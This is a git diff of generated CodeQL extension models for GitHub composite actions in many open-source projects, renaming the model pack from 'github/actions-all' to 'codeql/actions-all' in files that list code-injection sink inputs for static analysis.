diff --git a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml index 9314532b4263..95b63bfadd0d 100644 --- a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml +++ b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mumble-voip/mumble", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml index 961ad291c0d3..88da6f066378 100644 --- a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nasa/fprime", "*", "input.location", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml index d2a963c237e2..841140aa12e8 100644 --- a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nats-io/nats-server", "*", "input.label", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml index 809fde338779..04657e223adb 100644 --- a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nearform-actions/optic-release-automation-action", "*", "input.build-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml index 002a93c12498..7541c5b8dabe 100644 --- a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml +++ b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nektos/act", "*", "input.test_input_optional", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml index 67404b9f3118..2f4033d0825f 100644 --- a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml +++ b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.project-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml index e4eb1d83db2c..aeed286a882a 100644 --- a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["neondatabase/neon", "*", "input.save_perf_report", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml index fc29f5fc8ff3..4d980520bc32 100644 --- a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["neovim/neovim", "*", "input.install_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml index 352d2550b897..265179054337 100644 --- a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml +++ b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nhost/nhost", "*", "input.config", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml index 954216bb04ea..af31a4267fda 100644 --- a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nix-community/nixos-wsl", "*", "input.filename", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml index dcb267331603..6317a72443c0 100644 --- a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["novuhq/novu", "*", "input.tag", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["novuhq/novu", "*", "input.docker_name", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml index 4608da8fe61f..3b2bcb74bb62 100644 --- a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml +++ b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nymtech/nym", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml index e38ba9b4edf9..320eabd533c6 100644 --- a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml +++ b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["obsproject/obs-studio", "*", "input.failCondition", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml index 48a1bb5ca8b8..3af9358c65e9 100644 
--- a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml +++ b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ocaml/dune", "*", "input.OCAML_COMPILER", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml index 744b025fa655..a61edccecf87 100644 --- a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["oneflow-inc/oneflow", "*", "input.extra_flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml index d6c91a3853ca..2f7f8c150300 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.gem", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml index e49d896bce08..72601a404073 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-ruby", "*", "input.gem", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml index 66240fb41c37..6808b4a28933 100644 --- a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-watcom/open-watcom-v2", "*", "input.fullname", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml index e9fbe3a29507..93c348e570a8 100644 --- a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml +++ b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openapitools/openapi-generator", "*", "input.args", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml index bd94706b140a..31be17adf41b 100644 --- a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openjdk/jdk", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml index 39324776e809..89f2daede979 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["opensearch-project/opensearch-net", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml index 80c781f72df7..ce881a46225d 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["opensearch-project/security", "*", "input.plugin-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml index abee0f74453d..cd422d4278d1 100644 --- a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml +++ b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["opentrons/opentrons", "*", "input.destPrefix", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml index 9a20261be903..82d25587bf99 100644 
--- a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_files_changed", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml index a8c9d3fabcee..e6c66721c3f0 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.layout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml index c222d5e1fd95..668e681473df 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openzeppelin/openzeppelin-contracts", "*", "input.layout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml index 0a8427f29e4f..13c965ae30a3 100644 --- a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["oppia/oppia", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml index 52a2001db13a..726aab85e84e 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["oracle/graal", "*", "input.components", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml index 28d8cabc3684..4325315c595d 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["oracle/truffleruby", "*", "input.archive", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml index f3ef49171464..11da4a457089 100644 --- a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml +++ b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["orhun/git-cliff", "*", "input.command", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml index 6150422d177f..4064d556702f 100644 --- a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml +++ b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["oven-sh/bun", "*", "input.download-url", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml index ad99ed2b432a..c8d29fbe9f9c 100644 --- a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["owntracks/android", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml index 5df1a5f22302..5be8efeee399 100644 --- a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml +++ b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pandas-dev/pandas", "*", "input.meson_args", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml index b2c5857a743a..4b4e290a9cba 100644 --- a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pardeike/harmony", "*", "input.architecture", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml index 93996601c8af..6f56ef896d3d 100644 --- a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pennylaneai/pennylane", "*", "input.requirements_file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml index c1d90d6ab0a8..1520e1fa3b12 100644 --- a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml +++ b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["phalcon/cphalcon", "*", "input.target-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml index d29d4d5674d5..2d0a5e4f6d6c 100644 --- a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml +++ b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml 
@@ -1,12 +1,12 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["philosowaffle/peloton-to-garmin", "*", "input.framework", "code-injection", "generated"] - ["philosowaffle/peloton-to-garmin", "*", "input.os", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["philosowaffle/peloton-to-garmin", "*", "input.os", "output.artifact_name", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml index 0aaacca4805c..c4224e600572 100644 --- a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml +++ b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["php/php-src", "*", "input.jitType", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml index b69a77400798..b452fb2ebd53 100644 --- a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml +++ b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["phpdocumentor/phpdocumentor", "*", "input.passphrase", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml index 6ab3f7d2bf57..e75842caa3f2 100644 --- a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pinecone-io/pinecone-python-client", "*", "input.googleapis_common_protos_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml index f5ce35d96ad5..53a35fdd9d92 100644 --- a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml +++ b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pixijs/pixijs", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml index 519adffb097b..ca216f3b0912 100644 --- a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml +++ b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["posthog/posthog", "*", "input.group", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/primer_react.model.yml b/ql/lib/ext/generated/composite-actions/primer_react.model.yml index 69d0355d7202..25107038af5f 100644 --- a/ql/lib/ext/generated/composite-actions/primer_react.model.yml +++ b/ql/lib/ext/generated/composite-actions/primer_react.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["primer/react", "*", "input.token", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml index 97a694393759..04132df42bf5 100644 --- a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml +++ b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["project-chip/connectedhomeip", "*", "input.with", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml index 54e557061dfb..ca7d52c45a96 100644 --- a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml +++ b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["projectnessie/nessie", "*", "input.job-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/psf_black.model.yml b/ql/lib/ext/generated/composite-actions/psf_black.model.yml index 12ed97f6af51..3e42add86504 100644 --- a/ql/lib/ext/generated/composite-actions/psf_black.model.yml +++ b/ql/lib/ext/generated/composite-actions/psf_black.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["psf/black", "*", "input.summary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml index 2c64a6978afe..c0b4d00d5e5a 100644 --- a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pyca/cryptography", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml index f7982d2244a4..505790a2c9ad 100644 --- a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pyg-team/pytorch/geometric", "*", "input.torchvision-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml index 9678f3204257..ebb4ebff5e30 100644 --- a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml +++ b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["python-poetry/poetry", "*", "input.args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml index 2ee43fbcf6cd..fcac2d1554da 100644 --- a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml +++ b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["python/mypy", "*", "input.install_project_dependencies", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml index 2560e80f52c4..a4fc1bd993de 100644 --- a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["quarto-dev/quarto-cli", "*", "input.keychain-pw", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml index 17e4f893d390..6831b4406bc7 100644 --- a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml +++ b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["quay/clair", "*", "input.tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml index dde14bfa277d..c669f9be2f89 100644 --- a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml +++ b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["quickwit-oss/quickwit", "*", "input.target", "code-injection", "generated"] 
